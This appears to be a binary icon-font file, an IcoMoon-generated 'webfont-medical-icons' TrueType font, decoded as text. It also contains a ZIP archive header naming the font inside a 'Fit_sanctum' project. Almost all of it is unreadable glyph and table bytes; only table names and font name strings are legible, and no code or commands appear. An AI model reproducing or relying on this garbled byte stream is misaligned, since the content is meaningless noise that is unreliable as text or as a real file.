%7'7'77775'75'7%.54>7>'7.6775>?&4'.54>77>54.&54&'&4>7>7>7>&'.54.54>5>54.'54.'.'.'.5���LL*DB!"AB)ILCLL�LL�LL�LL��d�

;G;�

�,o�'��~���)l    F!!!!;

	

 2 

	


	


	

 

	

1

	

 3��\<93dgib07=E_aa_���)��'X��3:��0�2��.
	

!
2
!;" 

 "G!

!<!2!
����)>!s��K2>54.#"3!".54>32##".54>32*#0.1'.1#0'.1#0>?3332>=332>=33332>72>4?3032>5<13032>5<1382132>5<13032>5<13032>5<54.#.'.'.'"&*#*"#2>3232>75#".''23>75>72:3:6355.#"4.#.'#".'32>72:3:63500>7532>74.#.'5.'0015"&*#*#".'4060=.'.#">31*		��				e

"
,�n,	+?8



6>+*				)
				v*+-.+*)))))(	.01
		
*))	
10-�?()*



10-�46910-468

H								�



:�KK�	����

��

������
		
QXGGXQ
		
����T[K		,0%%0,		Q\J!
�� #.

Uy��" C# "�uU	' 

Su��vU	'"�����!!!!!!������6e5y7�����7	����E������.%."'7>4&'."'7>4&'."'7>4&'."<54.1!717>4&'"1;7>27>2!>54.#".54>32#2#".54>3".54>32#.5>3#7".54>32#".54>32#7#532>54.+532#�

��

��
��

�
	I��>t_BM
.!� 4$:c�L���(






'*((���
��
��
�
dxb�

,H_4%$�.!e7?JR+L�c:�B		_uP


p



:l!!'(���y�P232>7>.7>'.'&#".32>&'.47>3*#%" %@?C((C?@% "%$	*�%3
)VG-)E\32L=1*RV]5, 

 ,5]VR*1=L23\E)-GV)
3%���#9H*#1!3!2>=:32>54.#*#5:32##!".=!'��%k%%A11A%((�%��%���%%.@%%?.���&'�$$���l�$'!54>10!''#54>10zww�#�NR



�6����u���(

(�Au~B"		"B
����?T}!!'.3:32>'2&6&7.#3'7>32#".''!3.4'>;7#"!>'6.#9��e:I:
���	W��p
�FsU..VrF@h����
�{}�	+ 5AA�*3.

���m��G

29.pNm�JJ�mNc9



U.z		
!	

����+8OT'.54>7>67.'''5'57577''.#'7%%5�$01##10$�576I"''"H5987#)"")#�"0y0"0oK&5"�"6'Mp0���$w1""1/%%/B	�

�	d#!("$*������)#%'���_]g����*S32>7'#".'.7&>7'!'3'#'27>'.#!7'%:*!47<7aQ8
6	0AR+0/)!1w8�����	"	1J�h!:FP*;83"#?W5
,H3
*.1#B900��^6�!	!�G��(3���������7".1!01#./&&'81'.*"#"32>7>200*#%35#7#33535#5#".54>10#/>7>.'.'"#'.7>7>/.7>01U�����
	b!%!


	Jdf�}}/////+$*$#+#+�

�	�
H��aw
v
��AB

		


 :  �....�"*ZS;;SZ*"V

	
�	




�
	
s����#3!3#!B�����}��C�x� ����o�Q��2>54.#"32#".5<1#!#0#".5<54>3:3.454>7>54.#"32>5<&4'.'32>7>54.'.#"3&&33&&3�%B1	
	4��3	

	4D%fug�




[



	

�&33&&33&*1A%��|

		
}�o�(�o�}
		

|��%A1�	
	


	
	

	
	


	
	���=Wv�%"./7>32#172>7>54.'.#"3%.'>7.'.54>7>772>54.#"3�J�~m))m~�JJ�l))l�J


(6�HR[1/"	1\SI��	

1^UJKU_25







�$Eb>		>cD$$Dc>	?bE$~


6(�)E6&
,6@"/+'


&6F)�

'+/.+'

&6F**G6&
�







���-Vv�!"3!2>54.#2#".54>3.'#!#'.7>130%"#33535#5>54.#".54>32#z�1$$1�1$$1��$$##	
K%x�Ax%K
	
N)'�')M
	��, %$$$%%%!,�$1�1$$1�1$m$$$$�w�]���	
	(++(��	
	� ,( !%$$%! (, �

����7Pe����*@"32>'6.#*'2&4&3'64>30726%!"3!2>76.#2#".7&>37>;2#"./.67>>5246&5".'7'3#6?>#".'.65'77&>32#".7#".'7&>;23#".'7&>32/.74>'+737&>;2�54(b�2"$0�/%#1��	�&�
&j

>
ca<	gE�13N��'%%'��
1
�f
	

�	
�
�
�6	1
/



F?1�$0�0$$0�0$���rr
	I	.EE.	I	
*#86&&'&��	�		wx6		�		��	
					�	xw		�	
����8Qjx����0"$""3!2>54.#".7>7"37+0*153209+0*1532097'5>4&'7>&'7'>&'7'1'>4&'71'>4&'7����*)(

*�554&'33
	
[773








*
�+��()*��N�nh�I�
%#!"��/80��1:0(


"#!
(*(020*
7:8
>A>EHFMPL����iv���.67>&'0.'464614.#"74.0"72>3067>7>&'4.'&>73!!'%7267"&'!"3!2>54.###'./!!�
			M	<			�
:5�['�/��:���:��1$$1�1$$1B'�*�}��				b	;'-			

����E��

�9::9�$0�0%%0�0$�e

q<
t.��
����5Ng������/Hd}����0& ""3!2>54.#+".=4>;22+".=4>;'54>;2+".54>;2+".=7".=4>;2+754>;2+".54>;2+".=7".=4>;2+754>;2+".54>;2+".=7".=4>;2+#0*9".510<13%#4.'."#4>3#0*9".510<14>;2+".=54>;2+".5#!".=4>3!27+".=4>;2����*
((
*D88�888888W8807788W8828888W77y*3+���[r@�
 
	�Dy`�ʪ)2)8888>�0�H88�
*��(

)*�^++m++B++�++@++�++�++@++�++�++@++0�"-,
	..!�0{++��++x**x++		����/Pt�����!"3!2>54.#2#.#"#>3332>73#".5<647.>7'"<637266.'#".54>32!54>3!5#".54>;'.>?'##>7>4'./7#&/.6?>;2.'#53}�
.##-�.##.��
/	
.
Q67

��%+(!HH��Y	��



�O<S<O
c*	�
*c
 ���#.�
.##.�.#v

D

�+*&'(���L	e~



|�

3>2'

'2>3

A

	x	

	x	

A�������10" "1"3!2>54.######5353535353����*))
*����ҍ�����+��)
)*��I����H	�����������!!#32+32#".'0#<1"#".54>;5#".54>;5#".54>;5#".54>;5#".54>;5332+32+32#!"3!2>54.#2#".54>332!>3#".=3#5##5!7".=31#7!!�z�]TJJH
		&
	HJJTTOO>>&>>OOT�0$$0�0$$0��$$$$q��Q)Nn%n@N\��:��|

0%0�0$$0�0%X%$$%��

""]776
""
pM������-Wg���!"3!2>54.#2#".54>3>;2".'&4>?'5#0>7#'7>782177'#".54>30:3?32+".54>;7'#"!".54>70" "#".1504>3:12>;210#'".54>32#y�1$$1�1$$1�wmd
4s
	j POY1;3�d;	!�<�1|


&/(
"3�



�

t_\r	��

�����۵	I
&





�$1�0%%0�1$��~+'NCQV6A8��	P�[J




	
1







	�		

<	
	�





	����	*8=B[j�3#5!!1'#7'*+#53273##32>54.#73#5;#57!"3!2>54.##!".5!#!".=4>3!2IE��E+4#'N&+2)p
�*�1$$1�1$$1�
��
]��-[[�����55N`f�
E4MZ U

�[[[[�$1�1$$1�1$��		S��zcc
����ez����)>S�".1."03:>732>146<54.'"&"#"0#".5<5>54.+"""#'2>54.#"332>54.#"3!"3!2>54.#610>3210>+#".5<647#".54>7153533##5#'&>?>281#".'".54>32#3".54>32##".5<>7>454.'.5814>36�


	 y9�0$$0�0$$0��



(66(


A4:55:4�

	


	�



��		





G			G,$0�0$$0�0$s

	6))6	��;44;44-*&	
		+��



+		
	&*-
����)>Sl�������"32>54.#"32>54.#"32>54.#7"32>54.#%!"3!2>54.#4>32#".5'7!50:32>54.'''7'7:#"32>7.#'#37*#&6&6':37"32>'6.#".7&>32#2		4ms
		
�0$$0�0$$0��1C&&B22B&&C1*���@.9)H6
"[0�8
W1 !%��
		
%=;
		=#<..<#!>,,>!5&&53((3		�k�$0�0$$0�0$��&C11C&&C11C&��ii��K5H)0+$�./v	&!%�2;D$72-Kh-<<0





�-=""=--=""=-��(44''44(����-��!"3!2>54.#>'.7'".#0.'.'4.1.'0.'.''.77#".5<>70>7>3;2>54.'7321'+7v�0$$0�1$$1�O
	
	C	!J		
g	
Z:	

T�
�	

+
	
	"!�	�$0�1$$1�0$�	
	
���x�	

	3@: ��
p

!+(
	%		r
{{

:����#8Rq��.'>7>7.'.'>67>7.'>7>7.'.'%%>76../7>6V	


",








�&
'MD=<CM'��
(OE>?FO)
9�1#%/�/%#1"![gv=?tiY##Yit?=vg[!	


	+#


^




�#.4'#!
	

.8#!:, �'""
		.9$";, 
%%�%/�/%#1�1#�4Q99Q43R88R3���C@Uj�!"3!2>54.#!5#".=#".5<64?0>7>32.'0"&"#'#'5'.'7'.#0&"0#'#"'"170:137>77'>7<0457702233'017:337>77'>70464175'4.'7'.'*&#'#7>77'>74646575'4.'7'".54>32#2#".54>3'".54>32#"32>54.#|�0%%0�0%%0���0+!(?
6O`4?nS/+%-& &-%'


& .- ��		
						��

		�%0�0%%0�0%�t��] ,T	�
*O<$0Ro?$D=5�/- %$'/

* %,'s				�		�				*	
		
	���� ,C\�����32>54.+"3!!5!5!%##33535#32>54.+"3!"3!2>54.##".=4>;232#54.+"!".=4>;2321#!!!!5!5!�XX��8���233233GXX�0$$0�0$$0�o��nT��o����e��8��:z������33223\$0�0$$0�0$���0���
��L��wQ�����	����-:k�!"3!2>'.#2#".'>373733##7#"./!'#".7&>?>;2#767'.>''w�/%#1�1#%/��''%%�LSTSUVU�]��]
���
�F
!(
{x *���$0�0$$0�0$�&&&&"UTTUTT��]]
	��	
}	*,	((	,*	}55����-2v��!"3!2>7.#2#".'>33#'#7#!7##0*&1.?373!'.657!7>;7'&>7633%&>32#".73>32#".'q�/%#1�1%'/��"
$!!���6n�<�1�v0!'	#Q#(��)�<"
		%[�<�F
		
n				�$1�1$%0�0$�""""�ᰰ������
uuui
&
l�
	
��y�1�















����7LQ�#".=##".=#35#%!"3!2>54.#35#'3#35#53#3!'7!50:32>54.'''7'7:1l	
3

1�0�1$$1�1$$1�KD3DJ�����7/9*I7 
"]0�:Y0# % ��

��

���$0�0$$0�0$��0====��Sk l��L 6J*1,%�//~&!'�3=E$93-L����-Vk��!"3!2>54.#2#".54>3.'#!#'.7>130%"32>54.#&'.'.1.'.>7>1>7'./.>7>01037&'.47>2y�1$$1�1$$1��$$$$
J%x�Bx%K


M)'�((M
	��5''54((4?
	
	




	
	�$1�1$$1�1$l$##$�z�_���	

(**(��

	�(45''54(�

	)"	
	@	

		����7o���.#"32>7>'4.'>54.#"32>5<&5.'.54>7!"3!2>54.#2#".54>3#".5<1#!#0#".5<54>3:32t	
		�	
	��0$$0�0$$0��))))&


)��)



)7S^S4(





(






�$0�0$$0�0$V))))�



epZ��}Zpe




dwi4''4iwd
����-Sz��!"3!2>76.#2#".7&>3>;2"76"./!!##&'.47''7''777>;".7&>32###33737#w�1#%/�/%#1��  ""aJ!)+	_u	1i��ׄn	�3

�6u\##!!�7/-5-/�%0�1$$1�0%�!!!!�&�! 	%%��|�
0
	��#!!!!�.7..7�������&>7'/7'6.''5"'.54>275.54>75'.54>75.54>75'.54>756'7'6&7>54.''/./%%�
:5�['�yyu
>
	uyy����dd>dd����0$$0�0%%0C
(�+�~�y
���F�)'%!NL
')')')'l#1�1$&/�/%�d	r;	
s.������&@MVo�.+32>7>54.'&>73!!'%+#532#53#3#373##5#5%!"3!2>54.###'./!!\++a5�['��	/.`
ު�vll|�B/D�1$$1�1$$1B
*�*�}��B��@+2��E�Q�
	
a�(/'9)�(��(�$0�0%%0�0$�e

s>t/������
4����&>77%%'5'5<5<1''577'4.14.4=4.'.''57221'&"&"'6>7>54.'%%>54.'./�"5�^$..��+*-*+D((C�3-.k
	?32�0$$0�0$$0B*�*��w
?^��Dc�����������X�		�;	%0�0%#2�2#�i

q>t-������ajsv��&>7'%7>7>7.'.'>7>6'.'.'/'?'?7'%%>'.'./�
4�Z&�b
	-
		
	
.	
*R0O6N2%�D0Dy8f�0%#2�2#%0C
+�
)�|�y
?,1��F�		
						
4-/���)'��bY%/�/&$1�1#�fr?u0������-<��!"3!2>54.###'./!!'&>73!!'%32>7>73#".'.54>7>32#.'.#"#5#53#y�1$$1�1$$1B*�*�}ϭ
5�['��		

.
	

/			/C�C�$0�0%%0�0$�e

s>
t/��Z@+2��E�



	


	
5�((�
����)0" "1"3!2>54.####3353����)()

)��������+��))*����|������1r#".54>32%0" "1"3!2>54.#'5#+".54>75.7>7.54>323357�

����*()*�e
"!	�	"#
#!

	e�1

�+��)
)*��%#"1!�

�!1"
	



%$�����-9Ncx=�!"3!2>54.#2#".54>3#".53%2#".54>3'2#".54>76.54>"&"./''.=.='7''".4?>727>2543666'.5<54.5<''.='./4.5<''.5<55'.54>77>7>54.'5>56y�1$$1�0$$0�!!!!3



d���

�Z 
!
:	
K		
	

q��
9

�zU				(�$0�0%%0�0$��""""�#))#��


						�N�bb``�PR
))
R
5(/,�	METJ+.&$0)HVCN��
U
	�

!2�
	


�1!'������!3?KWd������1>54.#*#353:3'4."''#5:632#35#535#35#%35#535#35#735#535#35#/#357335#3#".454>327.#"32>=#357#'#35135##'#!"3!2>54.#!!!!!!'2>7'#".54>327.#"3�

	

� 56!�Y 56!� 56!S�
	"B�$!��-##.�-$$-����
�	

	�	m+'-
!mmm3)mG**GmB	



		
+*C11D)DDm@@�#.�
.##-�.#����

���N




����Sh���)D_%!!2#".54>34>30:121#0*#"&=0*1"&=*1".='2#".54>34>30:121#0*#"&=0*1"&=*1".='2#".54>34>30:121#0*#"&=0*1"&=*1".=0" "1"3!2>54.#'46276"&/&>%7>2/"&57.7!".514>3!21#Rt��-				7



;				7



;				7



���)
())��&'
]
]	��]

]
&&

���
z

ar��A		H[wwww[H		H[wwww[H		H[wwww[T+��)

(*�/��/ooon
/��/�0x��
����#Vz����6Xo��
1H%>4'.'.3:63'813:>3>&'4.'.""':12>76.'.'".'&2232>7>.''>32>54.#"3:772>54.#"32232>7>7>&'.#";2>54.#>4'.'.3:634&4&'4.#32>5154.+";2>5!"3!2>54.##54.#"#54.#"#5#".'32>54.+5>7>&'.#".5<64?0>7>32'#32+32>54.#82012>54.'.#3"32>=4.#�%(	


	
�	


		
		
�		�$$� \%%�0$$0�0$$0��G/) 	>
6N_3?mR/+�
		
  �		�inc				C	|		�		S�$0�0$$0�0$�y�\(:	�	+M<$0Qn>$D<4�	

 !��

		%%
����-BWl�������)>S��!"3!2>76.#2#".7&>3'2#".4'64>3#".4'64>32'2#".'>32#".7&>3'2#".'>32#".7&>3'2#".'>3".7&>32##".7&>32'64>301".4'".'>32##".'>32'&>32#".7>32#".'".'1'75"2"2##".7"6&6#1>7#70242#7>?>232##'2&>73}�+!)�*!,�Q




	?cu
			�
N	
�i�
�� +�+  +�+ ��3C!��:(N�`PK��		�W{N
	������)Ef��3#77#33737#7!"3!2>'.#/.5>"7/.7&>7>7/>7>.'6&4&5".7&>#0##"."/*&'81'.*#"32>7>00*#".1!01df%'%%'/�/%#1�1$&/��	_

^

O
�		�
:
zx
y$
 ""7����	
	
O



		

<QQ�#{%%%%$0�0$$0�0$�U	

		
	k		
		

t
	

��"HC//CH"^56
	
		




�			�����#!"3!2>76.#2.':3323>7">7332>7">733:3#23>52>7#32>52>7#3#3#*#.#4.#"2.#4.#"2.#4.1*#.3.#"".3.#"".3.+'.7&>323">32z�1#%/�/%#1��@Zh'	

	

		5)g_?B
			





A+C)AJ(
'L?-B.�$1�1$$1�1$��,RsF/EQ"9./EQ"8/FsR,Z!

B=+E[\
!

B=+E[\
.8< A5!1;22;2"6A872		���<HTm����%.'5234.'5#.5#35>54.''.54>75!"3!2>54.#2#".54>32#".54>3>;2#'##7##7".54>32###".5<5##".5<5!5!<1".?>;235	#"


	$"

5#	
^�."".�.##.�
		

		
�;





}a"5�5"g4''44''4vG


			��r		v

�	#�(

	
	+
	
"P%".�."".�."�





	



	�|ffff|��'45''54'@��		
R_T

T_R
		5P`1D";+�
��D����2K��'.=>557>=4.'&7>54.'>7>666244"&"&5.'<54>7.'.&'5./754>7227>37>7z


��0$$0�0$$0�-)
	�


	
!.692,�$)./)#(	�
	0$A2'D\4M

		

�77�#1�1#%/�/%�)
	8�z%�'	*	.@Q*5ZF&	����)5N`u���"32>'6.#%"32>7.###33737#!"3!2>76.#3'>323#7".7&>32#".'>32#7#.#"#6.#"#".'&>3!2#3'�		�M				�UVTSTVv�1#%/�/%#1��	r�

�

�6#%�%#-		
U=


��9

		
	


	TUUUU�$1�1$$1�1$��
		
�
L$$$$
L	�e
g��	
���-����;P!"3!2>54.#2#".54>37>;2.'.>?'##>7>4'./7#&/.67<.'>7>7'.'.'>7.'.7'3202017'37'37'3732+".54>;7'#"!".54>70" "#".4154>3!2>;210#'".54>32#��1$$1�1$$1���%	
�	&X
	E4I5E	X0	
	

�		�

	

cS=W�



�

u_]r��
����	S	I	
%

�$1�1$$1�1$���j
		
j	
:
	.6,#





#,6.	
:
	Z 
	

G

G
  
 ��ZY__
_^	WV






	�		=	
	�

���-Vv��!"3!2>54.#2#".54>3%#".=4>;232#54.+"".=4>;232#!#+".54>;7>372!##33535#z�0%%0�0%%0�""""��p��o+o����
9
�{U�"���433433�$1�1$$1�1$��""""Z��
0�����:V	�"��}33443����Gs0" "1"3!2>54.#".'.54>732>7#%/!'5.5&>76*&'3!7����*)(
)�M40,
#3 *	$(+'F9)	.2EU/m
���)	��~1E�*��))*�j
,14$E=2))29+($->&.L6c�	�/T
�,����-BW���!"3!2>54.#2#".54>3'2#".54>3#2#".54>3#54./.=4>3234&4&5./.54>32<1#0#".5<1##".'4&</###".=##".=#7#"'.?>1307>130021:32#".5<1#0#".5<1#0#".5<5.'81"./#0#".5#5<>?>323<674>?>54.'54>32y�1$$1�1$$1�				�
		


�
		


n��	
	SR	�Y
'##'

E

X

i���	RS	
	�$0�1$$1�0$��				�	

		

		

		

	�,>

	��		�
	

	[
X	�	@37,,73XcR]]�ssss�^`//_	.:3/95	^RdW\�	

>	�	X
[	

	
�		�����!&s��0" "1"3!2>54.#!5!7#535#54.+".'.47.'.54>3"72;2'#".'.467>54.#5232#54.##53���*
())o�n�7###
_


'

_#
]8 -!#7&#*�##�+��)
)*�#jjjj|0

	
'$


	 0�#+

+7@@*"��jj����1F���0" "1"3!2>54.#2#".54>32#".54>3#".=###".5##".515##".=4040=4>;200#3./###".=##".=##'.?42<1>;2����*))*�




		
�I


		
�									�
	\++e
+MH



HM*
6	�	6�*��((*u

		



		

�a		���		��		ɰ		�
		
����
S�������"�	
�
		�
	
����M\0& ""3!2>54.##"&5".=462354623546235462.5#462����*
((
*�e

				
	
	
	�+&/&�
*��(

)*��		�a�
��������.�""""�{���3Rg����6�����*Nm>47&6&4'.302625'"32>'6.#4.#324203>'&>7>'6.'>2#0".1.'4&64764>74>32#1".'0"#".'4&4&7&>7>7"#".'4&4&74>7>7.2232>5646&5.#'32>7.#"!"3!2>'.##7#!7##7&>;'#".'72>'6.'&".7&646'7">5>323272>56&4&'.+"3"676.#*.'.467>#*.#4.5&<65>27#1".'4&4&74>32'""#".5&4&65>7623:>7>'6&4&'.:>5>&'.3' 	^%

	;8$,��0%#2�2#%0~'�d&�2H+g	#*2 ;+

_*D-�H�	'
%	���`�Q/3Qh4	UR<yJD�@��$1�0%%0�1$�q����!>1	
T*+:!# n,5��T�=RU	
5gR2X�IJ�/
����)>W��(=Rg|"32>54.#'"32>54.#7"32>54.#%!"3!2>54.##54./.=4>323<.'./.54>324>32#".5#5<>?>32346465>?>54.'54>32#35*#<5:3"32>54.#7"32>54.#'"32>54.#".54>32#Z		d						f�1$$1�1$$1�L��	
	SR	��(D[43\D''D\34[D(����	RS	
�;SS



�`/S>##>S//R>$$>R/)H55H))G66G)		A		�				�$1�1$$1�1$��>
	�	�		�
		\		X	�	�3[D((D[34[D((D[4�	�	
>	�	X		\		
�		�?SSB



W		�		�$>R//S>$$>S//R>$�W6H()H5  5H)(H6

����#.9DOZepty��!"3!2>54.#.11&>7&>7&>7.67.7.7.7!/%0#".'#".'.1.54>32>323'{�0$$0�0$$0�!%&&�Kq	

6ɣ�����
�M�			

		
		

	

	�5�c�$0�0$$0�0$�$!e# ^# ^#!"!#h!#^ #^ #����&�&�>		�'�����1EYv0" "1"3!2>54.#2#".54>3'.674>1'7.?'707'#5.?>;2'����*)(

)��&&&&Nc
S=?
�b><R
T�R�	}	�
�+��))+&&&&�-gS<>gg><S�WONT��
	���).3���57'>7'%&7'>54.5'575'54.'&".5"&>3>54.5362754.'.'.47".'.54>3564$5%>54..54>7'ø
/Rm>/,(����/-)�ea
/Rm?�$
%


?	?
	
$
����*))*�tO�i==i�OP�i==i�PqE�)+0?lS.�{	�Gb(..>nQ0��GEEG},*
	

		


!	


		&�
)��(
*,��>h�NQ�j<<j�QN�h>	����#(Ap`j"32>54.#3#553#53#553#5!"3!2>54.##5##5#".=#".5<6570>7>32.#*#.#".#"*#"32>732>7354>7>742041>5."&#"*.5&4>3>3:4.#"8181".'81811"1"&"&5.'"&*#""*1".5&<63>32:3>7.'#*&#+"""#*.'.467>;8126263.'.74>23>5.'.467>281232>7&4&454>324>7>2>7>2811*"1".1.'3>71>7>54.'>454.'35<5#?
		
		HHHHHHHH-�1$$1�1$$1�KH�/, (	?
6N`4>oR/+



		





			
		
	
		


		
		





			
	

�HH	

	��''7''n''�''�$1�1$$1�1$�w��))]!+T	�	+N<$0Rn?$D<5�
	
	

SX

	
	








		

		

W



��'����Al����!"3!2>76.#732+".'>;7'#"#'%"#>32#".'332>'6.##".'>32'!!".'332>'6.#"#>32#.""23>2202032>'6.#y�1#%/�/%#1��}�		�			t`\s	
	>�h/6@!5ZF&&FZ592-|	#?--?#_�����;o[J~0<B%8fJ,,Jf8)G@2L1GatBO�i>>i�ON)&)%$%�$1�1$$1�1$�Q




l\
	, (D[44\D($.>$#>/�


		
�11��">W3- ,Kd:9eK+&6 :bG(>i�PQ�j=�����-:GTav�����$1p�!"3!2>76.##".'>32'#52>7'7'>''7'>&''7'>&''2#".'>3'6.'7.'6.'>2#".'>3#".':3#".'6&6&3##7#2#".7&6&6'>30:3332>7.'72>':324.'6#".7'##".'##".7##".'7&>;2.5'##7#'.457>#3"x�1$&/�/%#1		

		,
3	
=
J	
r		�
	-
%		;

	
\			

	



H
	�$/�/$&]&�$0�0$$0�0$�A

	

	�
	?


2
	"

		



		�	4
)
	

	
l�).%��%.))1+	44	+1)�	
��

��
		
*��
		
�

�		Ĭ|��|�		�����-3!"3!2>54.#2#".54>3#".5<1#!#0#".5<54>3:354.7>3>45<15>70+8+";2+";2+";2>54.+".54>;2>54.+".54>;>7>&'&"153026.'.'5:32o�0$$0�0$$0��))((#



)��(



)6!(





	




��

���

��

�	


)#4'�$0�0$$0�0$V)(()�



doY��yYod




duh4&j
	68+�
	








�+86	
h&4hud

����|�AKs����32>=#0".50.'1#".50.'10#&"&50.'*1*.50.'1#".50.'10#&"&'0.'*#3'3220>14>320>14>320:1020>16462720>1>32354.+"1!"3!2>54.#232>54>32#54.#"#".54>32!5!%301##>181#0.54>12#".54>332+".54>35!#4>312!54>32#!!��
		
#
	
�
	�1$$1�1$$1�				

h	�er��A		
K

/I		I		,��C	
X		BB��@	
)		
			
	(
	W	#"	
	#"	$`


`#$1�1$$1�1$�	
��		

��l��


�

u				��qq�		�
		
���	������7C\s������
2>54.#"3'2762#*&#.4'54>33535#5##3%!"3!2>54.#2.#"'>3#".54>32>;2#'##7##7!2!52#".54>3".54>32#+".54>;2#5!#4>312!54>32�

)5]#�1$$1�1$$1��	0







�	^
	))�))ys	�d�''''8
		


3	I

I	
B��C	
Y		�

�0>�%0�0$$0�0%l2		1	{







h
		
�gggg��	l��''''�)				�qq�

�		��
����-BG}!"3!2>76.#".7&>32#"32>'6.##'33#7&>7>&'.#"+&>7>}�+!)�*!,�{J�a::a�JL�d88d�L;fM++Mf;:gK..Kg:*RTTT


P
%27
� *�*  *�* ��9c�KK�b99b�KK�c9�,Lg::gL--Lg::gL,��UU		S	 ':(-02	����)>Sh�������)>Sh}���*&"2>7>.''>7>.'.3>7>.'.'>7>.'.27>4'.!"3!2>54.#>&'.672#".54>3#.7>3'>&'.67>'".52'.5>.'&4>7>'>&'.47&'.47>'>2"&'.467>2&'.467'>".'.>7#"./#4>?>7>'.'&4>7627&'.47>#".5<1##5###0#".5<54>3:3267>4'.�-;/%�0$$0�0$$0��.



F
)�! �?	'�/'$
�	

aa	
	(
=E=&��/��$0�0$$0�0$xC



��73p�M4lu !ù2s�		�

Fj

R6�			JRB��ddqBRJ			IWM&&MWIB
����!&+05:mr��0" "1"3!2>54.#'7'77'7'7'?''77"#".54>32#".'.'.#'7#".54>3232>=4>54.#"#".54>32'7����)
())�&%�A]]/]]-\]�]]?]]	/@$&C3
"�\]u#..$	

(0( 6J)-'"		

*F_54]D(
7&&�+��)

(*�&&��]].]\�]]�]\]]�



$@00@%
	

�]]F%&+8,!".

>0E?E/*J6 			5\E()F]5$ p&%����%!"3!2>54.###5#53533w�1$$1�1$$1?�������$1�1$$1�1$��������
	���-CP����	t��!"3!2>54.#2#".54>3"10".'.53%!'5!!5!0*1"./##0*&1.4?5#1#0*1.450>1>130010*1".5'1#4>32#".5#".54>32#".54>32#<54>3:3237>130!#".54>7'.467>237>;2132>54.'502>7>52#5##".54>32#<54>3:32~�1$$1�1$$1d8�od��:���&&&
F
&h



��5�'***��IY^B,	

�
�6��$1�1$$1�1$�~

	��r}}������UK

KU�&

� 		�!!r

r�Y^B66��	��!!����	8Mbw����$3#'73#737##";.>72" "3"3!2>'.#23".'>32#".7&>#"'.>7>#2'>#2".'.67&>323"#".7#".'7&>72>73.'.3"'".3">7'"#24>7>2>23"#!3'7'7#7733#7'3#'fA??A�\�&�

������)))
)��

	



	0	

Q


	3

1�
1=1V	



	
	

.�wYTw.	���BA$9777$?Ax?AA?m���QQ��*��
	
	.*��(
(
*.�F��
	


�e�	3��

,Z


	
u��30*SXXS)02���QQ		����-BW:Z�,d!"3!2>76.#2#".7&>3'2#".'>3'2#".7&>37>;27>#3""2#:32#".7&6&6+"#".'6&6&3#2#".7&6&6'.#"2"2#.7'#"#".'6&6&3#2#".7&6&6+1"#*.'"4&6/###".7'##".'7#7#'.7"./32>71#!".'.'7"242#.'*1*'3''>32'>7""374:3:2>7"6"2'7>7##%#".'.'.'.#".'"4&4#>7:612:332>7'.'0*#*'7.'7.'"4&4#>32z�1#%/�/%#1�
		
�





�

!S
n
#			

!

! 1+	,1 

! $#'<,()


	,()




#$&w%%" !""$ ! 




"%%�$0�0$$0�0$���				��v::u
9F>"$$"9F@rcyk		>C66C>		kycpqƌ����r�	

@Zxx
@ZxwY@


		

	�xx\@

����)0" "1"3!2>54.###5#53533����)
())<�������+��)

(*������������i!"3!2>76.##".6746&6'.#"#".'&<6'.7>7632>w�1#%/�/%#1�

	
+--/+-�$1�1$$1�1$��"*5##?12<$$<21?##5*"8<@%		%@<8
����.Q`4.#*#:32>5!"3!2>54.#6:32#*##!".5#!".=![!!+��*  *+  +���7))7
����m
= 
� � +��*  *+ ��'56'

9�]

����
&=0354.1!"3!2>54.##54.10#757
B

p�1$$1�1$$1N���_`�v55?$1�1$$1�1$��|  |^���^������AF[�!"3!2>54.#732+".54>;7'#"#55!!%4>32#".5#0*#".5<5462>54.'#0<5&>361v�1$$1�1$$1���



�	
u_]r
�o��	





	�v�z	-6-4W@$$@W4�	T�qB�$0�0%%0�0$�""





	\�11�







��
"&!K;Re88eR;U"+&
	6h�Rm�n����$;Pgl3737#7##3%!"3!2>76.#2.#"'>3#".7&>32>;2#'#!7##7!7!�!��2#%0�0%#2��)-(8
7*)*f$&&$��(�'9S&#��$&U:>�
���$0�0$$0�0$tj

f�$$%%��~~~~���HH����-DY���!"3!2>54.#2#".54>3>;2#'##7##7%2#".54>3.'1#".50<&54>?>1/0&4676210".1'&'.1.''7!"1'0>7>3!u�1$$1�1$$1�





�w,6 �6+��
		




)

&
	


7	
�zy���&( $.)d�%0�1$$1�0%�





��nnnn��


		


��
�$]S9


_ue�
	

#f
 qqP#%#,(/
����)>Sh��,G"3>56.''"32>54.#72>54.#"3'"32>54.#"32>54.#!"3!2>54.#!0>767>27>27>27>21%!57>4&'.#7>4&'.'>4&'."4.'."#".54646570>7>32'"32>54.#7#32+32>54.#3		%	�				�		,�0$$0�0$$0����		�		��		��		�
m		l���&	?
6N`3>nR/+�"



  	2#�				�		A$0�0$$0�0$�{QbR
�		��		��		�
m		m��S
&	�	*N<#/Rm>$D<4�	

  �L�~_<�δgδg�����������0�67!��	�����[�:<�478������[����	
��7���]
����b	/`������
��gs���

	����		�
���
��
		��	
��

�	��
	�
			�

�����
�N� `��	�
P<
�xfP��<D��p4�ZH� �"�$%:&J',(�)�+�,p-�-�123�4�5B6H9:<=R?X@�A D EE.GH�KTKrMMxM�N
N�O<O�QQRR�S�UHV0W,Y|Z�[\\]�^F`*a�b�c�e�f�g>h h�i�kk�mm�n�o�p�p�qpsbt�vJy4{�|�~j����„��<�v�R�x��<� �*�В
���L����>���L�R���F�ު`���v��4���n�*�*@*�*j
(�	*	�	*@	*�	*	*	
(�webfont-medical-iconsVersion 0.0webfont-medical-iconswebfont-medical-iconswebfont-medical-iconsRegularwebfont-medical-iconsGenerated by IcoMoonPK!m�#
�d�dFit_sanctum/fonts/webfont-medical-icons/fonts/webfont-medical-icons.ttfnu&1i��0OS/2���`cmap̀�<gaspXglyfb�K`]�head�{K_06hhea�]_h$hmtxAP�_�Hloca.[Ѡa�&maxp�pb� namec��c�postd� �������3	@ �������@ ( �� �������79���{�=]r".54>32#.'#!#'.7>130"#33535#5>54.#".54>32#."".-"#-S

`/��Ú/`


c43%�&24c
�� 8*$0../..0#*8 ''''�"..!!.."��	
P����
	X4774��1*8 3)*.//.*)3 8*��''''
0����0F\s���-%772#".'>332>7'6.#"+'3'>;2!".7>;23>56./&".7&>32#3'2>7.#";'*&5".4'7&>32#726##73#&/.;2>7>&/.+";2>?>&'..5"4&672>7'
��&A??$&##	
	
E

�H

=

����

=

��
�	

�	
��3$%21&&1$$&&4C�
O

�2!� 3�

O
�,		�$##$�C���	����	��L&
&"%22%%22%"&&&&UO= �Y<^
��
^<Y����'4B^w�>4&'71'>4&'>&''>4&''>4&'#'3".'.467>32>510<14.+0:92>510<14.+0:9�))((%$%%4!!!!)$


	

	�CE44FF^
J
